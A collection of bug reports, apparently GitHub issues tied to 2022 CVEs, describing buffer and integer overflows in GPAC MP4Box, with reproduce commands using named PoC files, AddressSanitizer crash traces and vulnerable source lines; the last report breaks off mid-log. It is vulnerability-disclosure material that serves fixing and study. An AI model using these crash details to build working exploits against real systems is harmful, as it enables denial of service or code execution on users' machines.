GPAC MP4box 2.1-DEV-rev649-ga8f438d20 is vulnerable to buffer overflow in h263dmx_process filters/reframe_h263.c:609

*   I looked for a similar issue and couldn't find any.
*   I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
*   I give enough information for contributors to reproduce my issue (meaningful title, github labels,

**Description**

buffer overflow in h263dmx\_process filters/reframe\_h263.c:609

**Version info**

latest version atm

    MP4Box - GPAC version 2.1-DEV-rev649-ga8f438d20-master
    (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    
    Please cite our work in your research:
    	GPAC Filters: https://doi.org/10.1145/3339825.3394929
    	GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration: --enable-sanitizer
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB  GPAC_DISABLE_3D
    

**Reproduce**

compile and run

    ./configure --enable-sanitizer
    make
    ./MP4Box import -cat poc_bof13.mp4
    

Crash reported by sanitizer

    [H263Dmx] garbage before first frame!
    Track Importing H263 - Width 704 Height 576 FPS 15000/1000
    =================================================================
    ==735609==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60e000000620 at pc 0x7ff71222b397 bp 0x7ffeaf3c2280 sp 0x7ffeaf3c1a28
    READ of size 4294967295 at 0x60e000000620 thread T0
        #0 0x7ff71222b396 in __interceptor_memcpy ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:827
        #1 0x7ff70fbae101 in memcpy /usr/include/x86_64-linux-gnu/bits/string_fortified.h:29
        #2 0x7ff70fbae101 in h263dmx_process filters/reframe_h263.c:609
        #3 0x7ff70f7a6f1d in gf_filter_process_task filter_core/filter.c:2815
        #4 0x7ff70f7665a3 in gf_fs_thread_proc filter_core/filter_session.c:1859
        #5 0x7ff70f772ece in gf_fs_run filter_core/filter_session.c:2120
        #6 0x7ff70f1b59c1 in gf_media_import media_tools/media_import.c:1551
        #7 0x5617e36bfb4c in import_file /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/fileimport.c:1498
        #8 0x5617e36ca5d7 in cat_isomedia_file /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/fileimport.c:2536
        #9 0x5617e3674130 in do_add_cat /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/mp4box.c:4562
        #10 0x5617e3674130 in mp4box_main /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/mp4box.c:6124
        #11 0x7ff70c73cd8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
        #12 0x7ff70c73ce3f in __libc_start_main_impl ../csu/libc-start.c:392
        #13 0x5617e3650cb4 in _start (/home/sumuchuan/Desktop/gpac_fuzz/gpac/bin/gcc/MP4Box+0xabcb4)
    
    0x60e000000620 is located 0 bytes to the right of 160-byte region [0x60e000000580,0x60e000000620)
    allocated by thread T0 here:
        #0 0x7ff7122a5867 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
        #1 0x7ff70f7b4528 in gf_filter_parse_args filter_core/filter.c:2033
        #2 0x7ff70f7b5234 in gf_filter_new_finalize filter_core/filter.c:510
        #3 0x7ff70f7b65d7 in gf_filter_new filter_core/filter.c:439
        #4 0x7ff70f7021c7 in gf_filter_pid_resolve_link_internal filter_core/filter_pid.c:3611
        #5 0x7ff70f7258b2 in gf_filter_pid_resolve_link_check_loaded filter_core/filter_pid.c:3711
        #6 0x7ff70f7258b2 in gf_filter_pid_init_task filter_core/filter_pid.c:4883
        #7 0x7ff70f7665a3 in gf_fs_thread_proc filter_core/filter_session.c:1859
        #8 0x7ff70f772ece in gf_fs_run filter_core/filter_session.c:2120
        #9 0x7ff70f1b59c1 in gf_media_import media_tools/media_import.c:1551
        #10 0x5617e36bfb4c in import_file /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/fileimport.c:1498
        #11 0x5617e36ca5d7 in cat_isomedia_file /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/fileimport.c:2536
        #12 0x5617e3674130 in do_add_cat /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/mp4box.c:4562
        #13 0x5617e3674130 in mp4box_main /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/mp4box.c:6124
        #14 0x7ff70c73cd8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:827 in __interceptor_memcpy
    Shadow bytes around the buggy address:
      0x0c1c7fff8070: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
      0x0c1c7fff8080: 00 00 00 00 00 00 00 00 00 00 00 fa fa fa fa fa
      0x0c1c7fff8090: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c1c7fff80a0: 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa fa
      0x0c1c7fff80b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x0c1c7fff80c0: 00 00 00 00[fa]fa fa fa fa fa fa fa 00 00 00 00
      0x0c1c7fff80d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c1c7fff80e0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
      0x0c1c7fff80f0: 00 00 00 00 00 00 00 00 00 00 00 fa fa fa fa fa
      0x0c1c7fff8100: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c1c7fff8110: 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==735609==ABORTING
    

Looks like the oob read happens in filters/reframe\_h263.c

    READ of size 4294967295 at 0x60e000000620 thread T0
       #0 0x7ff71222b396 in __interceptor_memcpy 
       ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:827
       #1 0x7ff70fbae101 in memcpy /usr/include/x86_64-linux-gnu/bits/string_fortified.h:29
       #2 0x7ff70fbae101 in h263dmx_process filters/reframe_h263.c:609
    

if compile without ASAN and run the same poc

    ./configure --static-bin
    make
    ./MP4Box import -cat poc_bof13.mp4
    

there will be segment fault

    [H263Dmx] garbage before first frame!
    Track Importing H263 - Width 704 Height 576 FPS 15000/1000
    Segmentation fault=          | (50/100)
    

backtrace atm

    pwndbg> bt
    #0  0x0000000000afc1cc in __memmove_avx_unaligned_erms ()
    #1  0x00000000007f0dbf in h263dmx_process ()
    #2  0x00000000006d9c90 in gf_filter_process_task ()
    #3  0x00000000006c5dbc in gf_fs_thread_proc ()
    #4  0x00000000006cb3bb in gf_fs_run ()
    #5  0x00000000006008ed in gf_media_import ()
    #6  0x00000000004313d1 in import_file ()
    #7  0x00000000004375f1 in cat_isomedia_file ()
    #8  0x0000000000411e78 in mp4box_main ()
    #9  0x0000000000a8c47a in __libc_start_call_main ()
    #10 0x0000000000a8dcd7 in __libc_start_main_impl ()
    #11 0x0000000000402c55 in _start ()
    

**POC**

poc\_bof13.zip

**Impact**

Potentially causing DoS and RCE

**Credit**

Xdchase

CVE-2022-47663: buffer overflow in h263dmx_process filters/reframe_h263.c:609 · Issue #2360 · gpac/gpac

GPAC MP4box 2.1-DEV-rev644-g5c4df2a67 is vulnerable to Buffer Overflow in gf_bs_read_data

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!

*   I looked for a similar issue and couldn't find any.
*   I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
*   I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop\_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95

Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/

**Description**

stack-buffer-overflow utils/bitstream.c:732 in gf\_bs\_read\_data

**Version info**

latest version atm

    MP4Box - GPAC version 2.1-DEV-rev644-g5c4df2a67-master
    (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    
    Please cite our work in your research:
    	GPAC Filters: https://doi.org/10.1145/3339825.3394929
    	GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration: --enable-sanitizer
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB  GPAC_DISABLE_3D
    

**Reproduce**

compile and run

    ./configure --enable-sanitizer
    make
    ./MP4Box import -cat poc_bof11.mp4
    

Crash reported by sanitizer

    Track Importing AAC  - SampleRate 88200 Num Channels 8
    =================================================================
    ==325854==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffc52ec0940 at pc 0x7fa1e477c501 bp 0x7ffc52ebf3a0 sp 0x7ffc52ebf390
    WRITE of size 1 at 0x7ffc52ec0940 thread T0
        #0 0x7fa1e477c500 in gf_bs_read_data utils/bitstream.c:732
        #1 0x7fa1e59d0a8c in latm_dmx_sync_frame_bs filters/reframe_latm.c:170
        #2 0x7fa1e59d289f in latm_dmx_sync_frame_bs filters/reframe_latm.c:86
        #3 0x7fa1e59d289f in latm_dmx_process filters/reframe_latm.c:526
        #4 0x7fa1e55eabac in gf_filter_process_task filter_core/filter.c:2795
        #5 0x7fa1e55aa703 in gf_fs_thread_proc filter_core/filter_session.c:1859
        #6 0x7fa1e55b700e in gf_fs_run filter_core/filter_session.c:2120
        #7 0x7fa1e4ff9a21 in gf_media_import media_tools/media_import.c:1551
        #8 0x55a84c1ccb4c in import_file /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/fileimport.c:1498
        #9 0x55a84c1d75d7 in cat_isomedia_file /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/fileimport.c:2536
        #10 0x55a84c181130 in do_add_cat /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/mp4box.c:4562
        #11 0x55a84c181130 in mp4box_main /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/mp4box.c:6124
        #12 0x7fa1e2580d8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
        #13 0x7fa1e2580e3f in __libc_start_main_impl ../csu/libc-start.c:392
        #14 0x55a84c15dcb4 in _start (/home/sumuchuan/Desktop/gpac_fuzz/gpac/bin/gcc/MP4Box+0xabcb4)
    
    Address 0x7ffc52ec0940 is located in stack of thread T0 at offset 5088 in frame
        #0 0x7fa1e59d20af in latm_dmx_process filters/reframe_latm.c:456
    
      This frame has 19 object(s):
        [48, 52) 'pck_size' (line 461)
        [64, 68) 'latm_frame_size' (line 525)
        [80, 84) 'dsi_s' (line 312)
        [96, 104) 'output' (line 460)
        [128, 136) 'dsi_b' (line 311)
        [160, 184) '<unknown>'
        [224, 248) '<unknown>'
        [288, 312) '<unknown>'
        [352, 376) '<unknown>'
        [416, 440) '<unknown>'
        [480, 504) '<unknown>'
        [544, 568) '<unknown>'
        [608, 632) '<unknown>'
        [672, 696) '<unknown>'
        [736, 760) '<unknown>'
        [800, 824) '<unknown>'
        [864, 888) '<unknown>'
        [928, 952) '<unknown>'
        [992, 5088) 'latm_buffer' (line 524) <== Memory access at offset 5088 overflows this variable
    HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
          (longjmp and C++ exceptions *are* supported)
    SUMMARY: AddressSanitizer: stack-buffer-overflow utils/bitstream.c:732 in gf_bs_read_data
    Shadow bytes around the buggy address:
      0x10000a5d00d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10000a5d00e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10000a5d00f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10000a5d0100: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10000a5d0110: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x10000a5d0120: 00 00 00 00 00 00 00 00[f3]f3 f3 f3 f3 f3 f3 f3
      0x10000a5d0130: f3 f3 f3 f3 f3 f3 f3 f3 00 00 00 00 00 00 00 00
      0x10000a5d0140: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10000a5d0150: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10000a5d0160: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10000a5d0170: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==325854==ABORTING
    

**POC**

poc\_bof11.zip

**Impact**

Potentially causing DoS and RCE

**Credit**

Xdchase

CVE-2022-47659: stack-buffer-overflow utils/bitstream.c:732 in gf_bs_read_data · Issue #2354 · gpac/gpac

GPAC MP4Box 2.1-DEV-rev649-ga8f438d20 is vulnerable to Buffer Overflow via media_tools/av_parsers.c:4988 in gf_media_nalu_add_emulation_bytes

*   I looked for a similar issue and couldn't find any.
*   I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
*   I give enough information for contributors to reproduce my issue (meaningful title, github labels,

**Description**

heap-buffer-overflow media\_tools/av\_parsers.c:4988 in gf\_media\_nalu\_add\_emulation\_bytes

**Version info**

latest version atm

    MP4Box - GPAC version 2.1-DEV-rev649-ga8f438d20-master
    (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    
    Please cite our work in your research:
    	GPAC Filters: https://doi.org/10.1145/3339825.3394929
    	GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration: --enable-sanitizer
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB  GPAC_DISABLE_3D
    

**Reproduce**

compile and run

    ./configure --enable-sanitizer
    make
    ./MP4Box import -catx poc_bof14.mp4
    

Crash reported by sanitizer

    [AVC|H264] Error parsing NAL unit type 8
    [AVC|H264] Error parsing Picture Param Set
    [avc-h264] SEI user message type 71 size error (71 but 27 remain), keeping full SEI untouched
    [AVC|H264] Error parsing NAL unit type 8
    [AVC|H264] Error parsing Picture Param Set
    [AVC|H264] Error parsing NAL unit type 8
    [AVC|H264] Error parsing Picture Param Set
    [avc-h264] SEI user message has less than 2 bytes remaining but no end of sei found
    =================================================================
    ==745696==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x615000014780 at pc 0x7f373f26d683 bp 0x7ffd5a01c290 sp 0x7ffd5a01c280
    WRITE of size 1 at 0x615000014780 thread T0
        #0 0x7f373f26d682 in gf_media_nalu_add_emulation_bytes media_tools/av_parsers.c:4988
        #1 0x7f373f26d682 in gf_avc_reformat_sei media_tools/av_parsers.c:6355
        #2 0x7f373fccee25 in naludmx_push_prefix filters/reframe_nalu.c:2398
        #3 0x7f373fcee8ac in naludmx_parse_nal_avc filters/reframe_nalu.c:2821
        #4 0x7f373fcee8ac in naludmx_process filters/reframe_nalu.c:3333
        #5 0x7f373f8a5f1d in gf_filter_process_task filter_core/filter.c:2815
        #6 0x7f373f8655a3 in gf_fs_thread_proc filter_core/filter_session.c:1859
        #7 0x7f373f871ece in gf_fs_run filter_core/filter_session.c:2120
        #8 0x7f373f2b49c1 in gf_media_import media_tools/media_import.c:1551
        #9 0x55b1ec0f1b4c in import_file /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/fileimport.c:1498
        #10 0x55b1ec0fc5d7 in cat_isomedia_file /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/fileimport.c:2536
        #11 0x55b1ec0a6130 in do_add_cat /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/mp4box.c:4562
        #12 0x55b1ec0a6130 in mp4box_main /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/mp4box.c:6124
        #13 0x7f373c83bd8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
        #14 0x7f373c83be3f in __libc_start_main_impl ../csu/libc-start.c:392
        #15 0x55b1ec082cb4 in _start (/home/sumuchuan/Desktop/gpac_fuzz/gpac/bin/gcc/MP4Box+0xabcb4)
    
    0x615000014780 is located 0 bytes to the right of 512-byte region [0x615000014580,0x615000014780)
    allocated by thread T0 here:
        #0 0x7f37423a4867 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
        #1 0x7f373ea2c72a in gf_bs_new utils/bitstream.c:154
        #2 0x7f373f26c993 in gf_avc_reformat_sei media_tools/av_parsers.c:6227
        #3 0x7f373fccee25 in naludmx_push_prefix filters/reframe_nalu.c:2398
        #4 0x7f373fcee8ac in naludmx_parse_nal_avc filters/reframe_nalu.c:2821
        #5 0x7f373fcee8ac in naludmx_process filters/reframe_nalu.c:3333
        #6 0x7f373f8a5f1d in gf_filter_process_task filter_core/filter.c:2815
        #7 0x7f373f8655a3 in gf_fs_thread_proc filter_core/filter_session.c:1859
        #8 0x7f373f871ece in gf_fs_run filter_core/filter_session.c:2120
        #9 0x7f373f2b49c1 in gf_media_import media_tools/media_import.c:1551
        #10 0x55b1ec0f1b4c in import_file /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/fileimport.c:1498
        #11 0x55b1ec0fc5d7 in cat_isomedia_file /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/fileimport.c:2536
        #12 0x55b1ec0a6130 in do_add_cat /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/mp4box.c:4562
        #13 0x55b1ec0a6130 in mp4box_main /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/mp4box.c:6124
        #14 0x7f373c83bd8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow media_tools/av_parsers.c:4988 in gf_media_nalu_add_emulation_bytes
    Shadow bytes around the buggy address:
      0x0c2a7fffa8a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c2a7fffa8b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c2a7fffa8c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c2a7fffa8d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c2a7fffa8e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x0c2a7fffa8f0:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c2a7fffa900: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c2a7fffa910: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c2a7fffa920: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c2a7fffa930: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c2a7fffa940: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==745696==ABORTING
    

if compile without ASAN and run the same poc

    ./configure --static-bin
    make
    ./MP4Box import -catx poc_bof14.mp4
    

The crash will happen at another place

    [AVC|H264] Error parsing NAL unit type 8
    [AVC|H264] Error parsing Picture Param Set
    [avc-h264] SEI user message type 71 size error (71 but 27 remain), keeping full SEI untouched
    [AVC|H264] Error parsing NAL unit type 8
    [AVC|H264] Error parsing Picture Param Set
    [AVC|H264] Error parsing NAL unit type 8
    [AVC|H264] Error parsing Picture Param Set
    [avc-h264] SEI user message has less than 2 bytes remaining but no end of sei found
    [avc-h264] invalid SPS: log2_max_frame_num_minus4 shall be less than 12, but is 16962257
    [AVC|H264] Error parsing NAL unit type 7
    [AVC|H264] Error parsing NAL unit type 8
    [AVC|H264] Error parsing Picture Param Set
    [avc-h264] SEI user message type 16 size error (45 but 7 remain), keeping full SEI untouched
    [avc-h264] invalid SPS: log2_max_frame_num_minus4 shall be less than 12, but is 32527
    [AVC|H264] Error parsing NAL unit type 7
    [AVC|H264] Error parsing NAL unit type 8
    [AVC|H264] Error parsing Picture Param Set
    [AVC|H264] Error parsing NAL unit type 8
    [AVC|H264] Error parsing Picture Param Set
    [AVC|H264] Error parsing NAL unit type 8
    [AVC|H264] Error parsing Picture Param Set
    [avc-h264] invalid SPS: log2_max_frame_num_minus4 shall be less than 12, but is 16964897
    [AVC|H264] Error parsing NAL unit type 7
    [avc-h264] Unknown aspect_ratio_idc: your video may have a wrong aspect ratio. Contact the GPAC team!
    [avc-h264] invalid SPS: log2_max_frame_num_minus4 shall be less than 12, but is 63
    [AVC|H264] Error parsing NAL unit type 7
    [avc-h264] Unknown aspect_ratio_idc: your video may have a wrong aspect ratio. Contact the GPAC team!
    realloc(): invalid next size
    Aborted
    

realloc(): invalid next size indicates that there was a bof on heap indeed, overwriting the size field of a heap chunk.

**POC**

poc\_bof14.zip

**Impact**

Potentially causing DoS and RCE

**Credit**

Xdchase

CVE-2022-47661: heap-buffer-overflow media_tools/av_parsers.c:4988 in gf_media_nalu_add_emulation_bytes · Issue #2358 · gpac/gpac

GPAC MP4Box 2.1-DEV-rev644-g5c4df2a67 is has an integer overflow in isomedia/isom_write.c

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!

    MP4Box - GPAC version 2.1-DEV-rev644-g5c4df2a67-master
    (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    
    Please cite our work in your research:
    	GPAC Filters: https://doi.org/10.1145/3339825.3394929
    	GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration: --enable-sanitizer
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB  GPAC_DISABLE_3D
    

    ./configure --enable-sanitizer
    make
    ./MP4Box import -cat iof.mp4
    

    [HEVC] Error parsing NAL unit type 33
    [HEVC] Error parsing NAL unit type 32
    [HEVC] Invalid log2_max_pic_order_cnt_lsb_minus4 80, max shall be 12
    [HEVC] Error parsing NAL unit type 33
    [HEVC] Error parsing Sequence Param Set
    [HEVC] Error parsing NAL unit type 34
    [HEVC] Error parsing NAL unit type 0
    Track Importing HEVC - Width 1 Height 6 FPS 488447261/488447261
    [HEVC] Error parsing NAL unit type 25
    [HEVC] NAL Unit type 25 not handled - adding
    [HEVC] Error parsing NAL unit type 32
    [HEVC] Invalid log2_max_pic_order_cnt_lsb_minus4 80, max shall be 12
    [HEVC] Error parsing NAL unit type 33
    [HEVC] Error parsing Sequence Param Set
    [HEVC] Error parsing NAL unit type 34
    [HEVC] Error parsing NAL unit type 0
    [HEVC] Error parsing NAL unit type 32         
    isomedia/isom_write.c:4931:87: runtime error: signed integer overflow: 1852736474 - -1953749291 cannot be represented in type 'int'

CVE-2022-47660: integer overflow in isomedia/isom_write.c:4931 · Issue #2357 · gpac/gpac

GPAC MP4box 2.1-DEV-rev593-g007bf61a0 is vulnerable to Buffer Overflow in eac3_update_channels function of media_tools/av_parsers.c:9113

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!

*   I looked for a similar issue and couldn't find any.
*   I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
*   I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop\_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95

Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/

**Description**

buffer overflow in eac3\_update\_channels function of media\_tools/av\_parsers.c:9113

static void eac3\_update\_channels(GF\_AC3Config \*hdr)
{
	u32 i;
	for (i=0; i<hdr->nb\_streams; i++) {
		u32 nb\_ch = ac3\_mod\_to\_total\_chans\[hdr->streams\[i\].acmod\]; // overflow
		if (hdr->streams\[i\].nb\_dep\_sub) {
			hdr->streams\[i\].chan\_loc = eac3\_chanmap\_to\_chan\_loc(hdr->streams\[i\].chan\_loc);
			nb\_ch += gf\_eac3\_get\_chan\_loc\_count(hdr->streams\[i\].chan\_loc);
		}
		if (hdr->streams\[i\].lfon) nb\_ch++;
		hdr->streams\[i\].channels = nb\_ch;
		hdr->streams\[i\].surround\_channels = ac3\_mod\_to\_surround\_chans\[hdr->streams\[i\].acmod\];
	}
}

**Version info**

latest version

    MP4Box - GPAC version 2.1-DEV-rev593-g007bf61a0-master
    (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    
    Please cite our work in your research:
    	GPAC Filters: https://doi.org/10.1145/3339825.3394929
    	GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration: --enable-sanitizer
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB  GPAC_DISABLE_3D
    

**Reproduce**

compile and run

    ./configure --enable-sanitizer
    make
    ./MP4Box import -add poc_bof7.swf
    

Crash reported by sanitizer

    [iso file] Unknown box type dvbs in parent stsd
    Track Importing EAC-3 - SampleRate 32000 Num Channels 6
    [AC3Dmx] 24 bytes unrecovered before sync word
    [AC3Dmx] 13 bytes unrecovered before sync word
    media_tools/av_parsers.c:9113:50: runtime error: index 8 out of bounds for type 'GF_AC3StreamInfo [8]'
    

**POC**

poc\_bof7.zip

**Impact**

Potentially causing DoS and RCE

**Credit**

Xdchase

CVE-2022-47653: buffer overflow in eac3_update_channels function of media_tools/av_parsers.c:9113 · Issue #2349 · gpac/gpac

GPAC MP4box 2.1-DEV-rev593-g007bf61a0 is vulnerable to Buffer Overflow in gf_hevc_read_sps_bs_internal function of media_tools/av_parsers.c:8261

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!

*   I looked for a similar issue and couldn't find any.
*   I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
*   I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop\_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95

Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/

**Description**

buffer overflow in gf\_hevc\_read\_sps\_bs\_internal function of media\_tools/av\_parsers.c:8261

	//sps\_rep\_format\_idx = 0;
	if (multiLayerExtSpsFlag) {
		sps->update\_rep\_format\_flag = gf\_bs\_read\_int\_log(bs, 1, "update\_rep\_format\_flag");
		if (sps->update\_rep\_format\_flag) {
			sps->rep\_format\_idx = gf\_bs\_read\_int\_log(bs, 8, "rep\_format\_idx");
			if (sps->rep\_format\_idx\>15) {
				return -1;
			}
		} else {
			sps->rep\_format\_idx = vps->rep\_format\_idx\[layer\_id\]; // overflow
		}

**Version info**

latest version

    MP4Box - GPAC version 2.1-DEV-rev593-g007bf61a0-master
    (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    
    Please cite our work in your research:
    	GPAC Filters: https://doi.org/10.1145/3339825.3394929
    	GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration: --enable-sanitizer
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB  GPAC_DISABLE_3D
    

**Reproduce**

compile and run

    ./configure --enable-sanitizer
    make
    ./MP4Box import -add poc_bof8.mov
    

Crash reported by sanitizer

    [iso file] Unknown box type dvbs in parent stsd
    [HEVC] Error parsing NAL unit type 16
